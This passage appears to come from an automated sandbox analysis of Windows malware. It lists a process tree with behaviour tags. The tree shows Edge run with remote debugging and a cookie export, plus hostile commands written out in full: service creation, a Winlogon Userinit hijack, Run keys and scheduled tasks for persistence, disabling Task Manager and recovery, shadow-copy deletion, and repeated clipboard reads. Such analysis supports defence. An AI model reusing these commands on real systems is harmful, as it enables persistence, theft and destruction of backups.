- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:1740 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x264,0x7ffc2b30f208,0x7ffc2b30f214,0x7ffc2b30f2204⤵PID:3324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=fr --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1856,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=2184 /prefetch:114⤵PID:5124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2088,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=2084 /prefetch:24⤵PID:2020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=fr --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2488,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=2684 /prefetch:134⤵PID:2616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=fr --js-flags=--ms-user-locale=fr_FR --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3488,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=3572 /prefetch:14⤵
- Uses browser remote debugging
PID:4224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=fr --js-flags=--ms-user-locale=fr_FR --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3496,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:14⤵
- Uses browser remote debugging
PID:1496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=fr --js-flags=--ms-user-locale=fr_FR --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4140,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=4160 /prefetch:14⤵
- Uses browser remote debugging
PID:5320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=fr --js-flags=--ms-user-locale=fr_FR --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4120,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=4164 /prefetch:94⤵
- Uses browser remote debugging
PID:6124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=fr --js-flags=--ms-user-locale=fr_FR --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4212,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=4288 /prefetch:14⤵
- Uses browser remote debugging
PID:2424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=fr --js-flags=--ms-user-locale=fr_FR --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=4260,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=4396 /prefetch:94⤵
- Uses browser remote debugging
PID:5208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=fr --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4992,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=5376 /prefetch:144⤵PID:5148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=fr --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3684,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=4016 /prefetch:144⤵PID:1884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=fr --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4200,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=5576 /prefetch:144⤵PID:896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=fr --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1644,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=5608 /prefetch:144⤵PID:3548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=fr --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6336,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=6360 /prefetch:144⤵PID:6128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=fr --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6336,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=6360 /prefetch:144⤵PID:3380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=fr --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6320,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=6452 /prefetch:144⤵PID:5212
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.execookie_exporter.exe --cookie-json=10205⤵PID:4428
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=fr --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6548,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=6568 /prefetch:144⤵PID:5992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=fr --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6588,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=6540 /prefetch:144⤵PID:2096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=fr --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6448,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=6484 /prefetch:144⤵PID:5200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=fr --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6748,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=6632 /prefetch:144⤵PID:2088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=fr --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6484,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=6544 /prefetch:144⤵PID:4248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=fr --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6856,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=6684 /prefetch:144⤵PID:3988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=fr --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7052,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=7180 /prefetch:144⤵PID:2064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=fr --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6796,i,14453051298879596444,10139323343786280235,262144 --variations-seed-version --mojo-platform-channel-handle=7332 /prefetch:144⤵PID:5320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "sc create WindowsNovaBooter binPath= "C:\Users\Admin\AppData\Local\Microsoft\MagTable\efdzdfzedzed.exe" start= auto obj= LocalSystem"3⤵PID:4752
-
C:\Windows\system32\sc.exesc create WindowsNovaBooter binPath= "C:\Users\Admin\AppData\Local\Microsoft\MagTable\efdzdfzedzed.exe" start= auto obj= LocalSystem4⤵
- Launches sc.exe
PID:5932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit"3⤵PID:4884
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit4⤵PID:5148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\Program Files\Windows NT\TableTextService\efdzdfzedzed.exe" /f"3⤵PID:832
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\Program Files\Windows NT\TableTextService\efdzdfzedzed.exe" /f4⤵
- Modifies WinLogon for persistence
PID:5392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Windows_Health_Courtage_WQVzdq"3⤵PID:2492
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Windows_Health_Courtage_WQVzdq4⤵PID:6132
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Windows_Health_Courtage_WQVzdq"3⤵PID:3244
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Windows_Health_Courtage_WQVzdq4⤵PID:1832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupWQVzdq /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe\" /F /rl highest"3⤵PID:3356
-
C:\Windows\system32\cmd.execmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupWQVzdq /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe\" /F /rl highest4⤵PID:1948
-
C:\Windows\system32\schtasks.exeschtasks /create /sc onlogon /tn WindowsDriverSetupWQVzdq /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe\" /F /rl highest5⤵
- Scheduled Task/Job: Scheduled Task
PID:1304
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\efdzdfzedzed.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""3⤵PID:4248
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "4⤵
- Command and Scripting Interpreter: PowerShell
PID:5260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"3⤵PID:5036
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵PID:1208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\x0kvPXJDeRjC.vbs"3⤵PID:5320
-
C:\Windows\system32\cscript.execscript C:\Users\Admin\AppData\Roaming\x0kvPXJDeRjC.vbs4⤵PID:2588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reagentc /disable"3⤵PID:3240
-
C:\Windows\system32\ReAgentc.exereagentc /disable4⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:2064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Windows_Health_Courtage_WQVzdq /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe /f"3⤵PID:5620
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Windows_Health_Courtage_WQVzdq /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe /f4⤵
- Adds Run key to start application
PID:3692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Windows_Health_Courtage_WQVzdq /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe /f"3⤵PID:620
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Windows_Health_Courtage_WQVzdq /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\efdzdfzedzed.exe /f4⤵
- Adds Run key to start application
PID:2848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "vssadmin delete shadows /all /quiet"3⤵PID:2068
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:1880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:2880
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:3776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:5092
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:5256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:4812
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:1164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5420 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:5564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:5964
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:4592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:3216
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:2080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:5300
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:1468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:1452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:3928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:1208
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:3692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:1368 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:2652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:1436
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:4896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:2940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:1420
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:4112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:3820
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:1204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:4744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:5404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:3900
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:1132
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:2200
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:2292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:6100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:5316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:968
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:5284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:1256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:2912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:2236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:1304 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:1852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:1364 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:3336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:4932 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:2984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:5824
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:3948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:2964
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:5672
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:316 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:3968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:3796
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:1776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5512 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:1616 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:2384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:1012 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:1244
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:5832
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:5236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:3680
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:5984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:2248 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:5296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:5964
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:5700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:2080 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:5060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:5300
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:2952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5652 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:4436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5640 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:3564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:2652
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:5356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:5312
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:1660
-
-
-
